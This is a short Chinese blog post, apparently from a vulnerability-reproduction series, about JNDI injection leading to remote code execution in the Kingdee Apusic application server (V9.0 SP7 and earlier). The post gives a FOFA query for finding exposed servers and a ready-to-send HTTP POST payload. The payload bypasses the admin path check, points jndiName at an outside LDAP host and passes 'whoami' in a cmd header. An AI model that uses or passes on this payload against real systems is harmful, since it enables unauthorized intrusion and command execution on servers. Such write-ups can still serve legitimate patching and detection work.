Babing
Published on 2024-08-30 / 28 Visits
0
0

J17-3金蝶-Apusic应用服务器-JNDI注入

J17-3金蝶-Apusic应用服务器-JNDI注入

漏洞描述:

由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向createDataSource接口执行JNDI注入,造成远程代码执行。利用该漏洞需低版本JDK且需要服务器上有数据库驱动。

影响版本:

金蝶Apusic应用服务器 <= V9.0 SP7
不受影响版本
金蝶Apusic应用服务器 > V9.0 SP7

网站图片:

image-1.webp

网络测绘:

fofa语法:

body=“easSessionId” || header=“easportal” || header=“eassso/login” || banner=“eassso/login” || body=“/eassso/common” || (title=“EAS系统登录” && body=“金蝶”) || header=“EASSESSIONID” || banner=“EASSESSIONID”

漏洞复现:

payload:

POST /admin/;//protect/datasource/createDataSource HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: whoami

name=jndi1&jndiName=ldap://dnslog.pw&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=jndi&userName=jndi&password=jndi&repassword=jndi&connectionURL=jndi&driverClassName=java.lang.String&testCommand=

效果图:
Dnslog验证


Comment